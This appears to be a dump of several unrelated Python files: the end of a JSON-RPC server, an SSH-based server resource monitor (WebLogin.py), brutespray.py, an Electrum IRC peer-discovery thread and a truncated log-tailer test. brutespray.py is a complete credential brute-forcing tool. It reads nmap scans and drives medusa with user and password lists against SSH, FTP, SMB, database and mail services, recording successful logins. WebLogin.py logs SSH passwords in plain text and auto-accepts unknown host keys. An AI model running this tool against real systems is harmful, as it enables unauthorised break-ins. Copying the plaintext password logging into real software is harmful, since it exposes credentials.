elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
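# Illustrative only, added for clarity (not part of the generated server): the
# start/stop pattern described in the docstring above -- run the HTTP server in a
# child process so the bound port is returned and the server can be stopped
# later. Defined but never called.
def _start_stop_example():
    bound_port = start_server(newprocess=True)
    # ... exercise the service against localhost:bound_port here ...
    stop_server()
    return bound_port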
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
WebLogin.py
|
#! /bin/env python
#coding:utf8
from threading import Thread
from Queue import Queue
from socket import error
from re import compile
from ConfigParser import *
#from os import *
import subprocess
import time
import paramiko
import sys
import signal
import Mobigen.Common.Log as Log
SHUTDOWN = False
def shutdown(sigNum, frame):
global SHUTDOWN
SHUTDOWN = True
sys.stderr.write("Catch Signal :%s" % sigNum)
sys.stderr.flush()
signal.signal(signal.SIGTERM, shutdown) # sigNum 15 : Terminate
signal.signal(signal.SIGINT, shutdown) # sigNum 2 : Interrupt
signal.signal(signal.SIGHUP, shutdown) # sigNum 1 : HangUp
signal.signal(signal.SIGPIPE, shutdown) # sigNum 13 : Broken Pipe
class WebLogin(object):
def __init__(self, ip, username, password, password2, port=22):
self.ip =ip
self.uname = username
self.pw = password
self.pw2 = password2
self.port = int(port)
self.client = paramiko.SSHClient()
self.OKFlag = "OK"
def SSHClinetConnection(self):
client = self.client
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
__LOG__.Trace( 'SSH IP : %s , USER : %s , PORT : %s' %(self.ip, self.uname, str(self.port)) )
client.connect(self.ip, username=self.uname, password=self.pw, port=self.port, timeout=10)
except:
__LOG__.Trace( 'SSH2 IP : %s , USER : %s , PORT : %s' %(self.ip, self.uname, str(self.port)) )
client.connect(self.ip, username=self.uname, password=self.pw2, port=self.port, timeout=10)
def commandDISK(self):
stdin, stdout, stderr = self.client.exec_command('df -m')
dlist = []
for line in stdout:
line = line.strip()
dlist.append(line.split())
#get total list
rl =[]
for idx in range(1, len(dlist)):
if len(dlist[idx])==1:
rl.append(dlist[idx]+dlist[idx+1])
elif len(dlist[idx])==6:
rl.append(dlist[idx])
del(dlist)
#get total, use, free, usage value
result = []
for i in range(len(rl)):
total = int(rl[i][2])+int(rl[i][3])
tmp =[]
for j in [5,1,2,3,4]:
if j==1:
tmp.append(str(total)) #total = use+free
elif j==4:
tmp.append(str(int(rl[i][2])*100/total)) #usage percent = use / total
else:
tmp.append(rl[i][j])
result.append({'STATUS':'OK','VALUE':tmp})
del(tmp)
del(rl)
return result
def commandSWAP(self):
stdin, stdout, stderr = self.client.exec_command('free -m')
slist =[]
for line in stdout:
line = line.strip()
slist.append(line.split())
#print slist
result =[]
        used = int(slist[len(slist)-1][2]) # 'used' column of free -m
        free = int(slist[len(slist)-1][3]) # 'free' column of free -m
total = used + free
result.append(str(total))
result.append(str(used))
result.append(str(free))
result.append(str(used*100/total))
retdic={'STATUS':'OK','VALUE':result}
return retdic
    def commandLOAD_AVG(self): # load average
result=[]
stdin, stdout, stderr = self.client.exec_command('uptime')
patt = compile(r"[0-9]?\.[0-9]{2}")
for line in stdout:
loadavg = patt.findall(line)
result.append(loadavg[0])
result.append(loadavg[1])
result.append(loadavg[2])
        retdic={'STATUS':'OK','VALUE':result} # the three load average values
return retdic
def commandMEMORY(self):
stdin, stdout, stderr = self.client.exec_command('free -m')
flist =[]
for line in stdout:
line = line.strip()
flist.append(line.split())
#total = used + free + buffers + cached
total = int(flist[1][2])+int(flist[1][3])+int(flist[1][5])+int(flist[1][6])
#real free memory = free + buffers + cached
free_memory = int(flist[1][3])+int(flist[1][5])+int(flist[1][6])
#real use memory = total - (free + buffers + cached)
use_memory = total - free_memory
        #real usage percent = use_memory * 100 / total
usage_percent = use_memory*100 / total
result =[]
result.append(str(total))
result.append(str(use_memory))
result.append(str(free_memory))
result.append(str(usage_percent)[:2])
retdic={'STATUS':'OK','VALUE':result}
return retdic
def commandHOSTNAME(self):
hlist=[]
stdin, stdout, stderr = self.client.exec_command('hostname')
for line in stdout:
line = line.strip()
hlist.append(line)
retdic={'VALUE':hlist}
return retdic
def run(self):
infodic=dict()
try:
self.SSHClinetConnection()
infodic['HOSTNAME']=self.commandHOSTNAME()
infodic['STATUS']=self.OKFlag
infodic['LOAD_AVG']=self.commandLOAD_AVG()
infodic['DISK']=self.commandDISK()
infodic['MEMORY']=self.commandMEMORY()
infodic['SWAP']=self.commandSWAP()
self.client.close()
__LOG__.Trace(infodic)
return infodic
except :
self.OKFlag = "NOK"
infodic['STATUS']=self.OKFlag
shell = "hostname"
p = subprocess.Popen(shell,shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
hostname = p.stdout.readline()
hostname = hostname.strip()
infodic['HOSTNAME']={'VALUE': [hostname]}
self.client.close()
__LOG__.Trace(infodic)
__LOG__.Exception()
return infodic
class JobProcess(object):
def __init__(self, svrobjlist):
self.data_q = Queue([])
self.THREADPOOL = 10
self.total = dict()
self.putdata(svrobjlist)
def job_process(self,th_id):
while not SHUTDOWN:
try:
ip,obj = self.data_q.get_nowait()
__LOG__.Trace('thread get : %s ' % th_id)
except:
__LOG__.Trace("thread %s is done" % th_id)
break
self.total[ip] = obj.run()
time.sleep(0.1)
def putdata(self, svrobjlist):
for ip,svrobj in svrobjlist:
self.data_q.put((ip,svrobj))
def makeThreadlist(self):
th_list = list()
for i in range(self.THREADPOOL):
th_obj = Thread(target=self.job_process, args=[i])
th_list.append(th_obj)
return th_list
def run(self):
th_list = self.makeThreadlist()
for th_obj in th_list:
th_obj.start()
for th_obj in th_list:
th_obj.join()
__LOG__.Trace("[Collect]SERVER RESOURCE END_______________________")
return self.total
class ServerResource(object):
def __init__(self, getconfigparser):
self.config = getconfigparser
def getConfParser(self):
conflist = list()
conf_dict = dict()
type_list = ['SSH_PORT','USER','PASSWD','PASSWD2']
for rsc_ip in self.config.get('RESOURCES','SERVER_LIST').split(','):
conf_dict['IP'] =rsc_ip
for type in type_list:
try:
conf_dict[type] = self.config.get(rsc_ip,type)
except:
conf_dict[type] = self.config.get('RESOURCES',type)
conflist.append((conf_dict['IP'], conf_dict['SSH_PORT'], conf_dict['USER'], conf_dict['PASSWD'], conf_dict['PASSWD2']))
# __LOG__.Trace(conflist)
return conflist
def run(self):
svrlist =[]
__LOG__.Trace("[Collect]SERVER RESOURCE START_____________________")
infolist = self.getConfParser()
for tup in infolist:
            __LOG__.Trace('IP : %s, UserName : %s , Password : %s, Password2 : %s, port : %s' %( tup[0],tup[2],tup[3],tup[4],tup[1]) )
svr_obj = WebLogin(tup[0],tup[2],tup[3],tup[4],tup[1]) # ip, username, password, password2, port=22
svrlist.append((tup[0],svr_obj))
jp_obj = JobProcess(svrlist)
return jp_obj.run()
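# Illustrative only, added for clarity (not part of the original module): the INI
# layout ServerResource.getConfParser() above appears to expect -- a RESOURCES
# section with SERVER_LIST plus default SSH_PORT/USER/PASSWD/PASSWD2 values,
# optionally overridden in a per-IP section. All values are hypothetical.
EXAMPLE_RESOURCE_CONF = """
[RESOURCES]
SERVER_LIST = 192.168.0.10,192.168.0.11
SSH_PORT = 22
USER = monitor
PASSWD = first-password
PASSWD2 = fallback-password
[192.168.0.11]
SSH_PORT = 2222
"""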
|
brutespray.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.dom.minidom
import re
import argparse
import argcomplete
import threading
import itertools
import tempfile
import shutil
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.6.4' \
+ '\n Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal
print colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal
print "Available services to brute-force:"
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print "Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts"
args.service = raw_input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = raw_input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = raw_input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = raw_input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = raw_input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = raw_input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
            singluser = raw_input(colors.lightblue + 'Would you like to specify a single username or password (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = raw_input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = raw_input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print colors.normal
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
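# Illustrative only, added for clarity (not part of the original brutespray):
# shows the regular expressions used by make_dic_gnmap() against one hypothetical
# .gnmap line. Defined but never called.
def _gnmap_regex_example():
    line = 'Host: 10.0.0.5 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx/'
    matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + 'ssh')
    ports = matches.findall(line)                      # ['22']
    ips = re.findall(r'[0-9]+(?:\.[0-9]+){3}', line)   # ['10.0.0.5']
    return ports, ips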
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
doc = xml.dom.minidom.parse(args.file)
for host in doc.getElementsByTagName("host"):
try:
address = host.getElementsByTagName("address")[0]
ip = address.getAttribute("addr")
eip = ip.encode("utf8")
iplist = eip.split(',')
except:
# move to the next host
continue
try:
status = host.getElementsByTagName("status")[0]
state = status.getAttribute("state")
except:
state = ""
try:
ports = host.getElementsByTagName("ports")[0]
ports = ports.getElementsByTagName("port")
except:
continue
for port in ports:
pn = port.getAttribute("portid")
state_el = port.getElementsByTagName("state")[0]
state = state_el.getAttribute("state")
if state == "open":
try:
service = port.getElementsByTagName("service")[0]
port_name = service.getAttribute("name")
except:
service = ""
port_name = ""
product_descr = ""
product_ver = ""
product_extra = ""
name = port_name.encode("utf-8")
tmp_port = pn.encode("utf-8")
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def brute(service,port,fname,output):
if args.userlist is None and args.username is None:
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif args.userlist:
userlist = args.userlist
uarg = '-U'
elif args.username:
userlist = args.username
uarg = '-u'
if args.passlist is None and args.password is None:
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif args.passlist:
passlist = args.passlist
parg = '-P'
elif args.password:
passlist = args.password
parg = '-p'
if args.continuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont, aarg, auth], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in iter(p.stdout.readline, b''):
print line,
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading_spinner():
    # Spinner shown while the nmap output file is parsed; it polls the
    # module-level `loading` flag that make_dic_gnmap()/make_dic_xml() set
    # to True once parsing is finished.
for c in itertools.cycle(['|', '/', '-', '\\']):
if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
argcomplete.autocomplete(parser)
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
print(banner)
args = parse_args()
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print colors.lightblue + "Supported Services:\n" + colors.green
print ('\n'.join(supported))
print colors.normal + "\n"
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if os.path.isfile(args.file):
try:
            t = threading.Thread(target=loading_spinner)
t.start()
doc = xml.dom.minidom.parse(args.file)
make_dic_xml()
except:
make_dic_gnmap()
if args.interactive is True:
interactive()
animate()
if services == {}:
print "\nNo brutable services found.\n Please check your Nmap file."
else:
print "\nError loading file, please check your filename."
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output))
brute_process.start()
#need to wait for all of the processes to run...
#shutil.rmtree(tmppath, ignore_errors=False, onerror=None)
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'A_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-arg")
def on_join(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(A_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("A_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
test_tailchaser.py
|
import glob
import gzip
import logging
import logging.handlers
import os
import tempfile
import threading
import time
import six
from tailchaser.cli import main
from tailchaser.tailer import Tailer
def cmp_file(src_file, dst_file):
six.print_('testing: ', src_file, dst_file)
assert (Tailer.file_opener(src_file, 'rb').read() == Tailer.file_opener(dst_file, 'rb').read())
def cmp_files(src_path, dst_path, make_name=os.path.basename):
src_files = glob.glob(src_path)
for src_file_path in src_files:
dst_file_path = os.path.join(dst_path, make_name(src_file_path))
cmp_file(src_file_path, dst_file_path)
class Logger(threading.Thread):
def __init__(self):
self.RUNNING = False
super(Logger, self).__init__()
def run(self):
count = 0
self.RUNNING = True
while self.RUNNING:
count += 1
self.emit(count)
def emit(self, count):
six.print_(count)
class RotatingWithDelayFileHandler(logging.handlers.RotatingFileHandler):
ROLL_DELAY = 2
EMIT_DELAY = 1
rolls = 0
ENCODING = None
def doRollover(self):
time.sleep(self.ROLL_DELAY)
self.rolls += 1
six.print_('rolls', self.rolls)
return super(RotatingWithDelayFileHandler, self).doRollover()
def emit(self, record):
time.sleep(self.EMIT_DELAY)
return super(RotatingWithDelayFileHandler, self).emit(record)
@classmethod
def generate(cls, log_file_path, emits, max_bytes=1024, backup_count=100):
count = 0
logger = logging.getLogger(__file__)
handler = cls(log_file_path, maxBytes=max_bytes, backupCount=backup_count, encoding=cls.ENCODING)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(name)-12s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
while count < emits:
count += 1
logger.error("%08d. %s", count, 'x' * 64)
class RotatingGzipFileHandler(RotatingWithDelayFileHandler):
def doRollover(self):
"""
